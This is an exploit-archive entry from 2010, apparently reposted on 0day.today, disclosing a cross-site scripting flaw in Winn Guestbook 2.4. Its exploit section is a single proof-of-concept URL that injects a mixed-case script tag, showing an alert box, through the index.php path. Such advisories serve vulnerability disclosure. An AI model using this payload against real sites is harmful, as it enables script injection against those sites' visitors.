id: 11233
date: 03/09/2010
title: Winn Guestbook V2.4 Cross Site Scripting Vulnerability
author: indoushka
cves: 

======================================================
Winn Guestbook V2.4 Cross Site Scripting Vulnerability
======================================================

Affected Software :	 winn:winn_guestbook:2.4

====================
| # Title : Winn Guestbook V2.4, Winn.ws Cross Site Scripting
Vulnerability |
| # Author : indoushka
| # Tested on: windows SP2 Fran?§ais V.(Pnx2 2.0) + Lunix
Fran?§ais v.(9.4 Ubuntu) |
| # Bug : XSS
|
====================== Exploit By indoushka ===========
| # Exploit :
|
| 1-
http://127.0.0.1/Winn-Guestbook[php]/index.php/>"><ScRiPt>alert(21377181886
0)</ScRiPt>
|
============= Dz-Ghost Team ===============




#  0day.today [2023-03-24]  #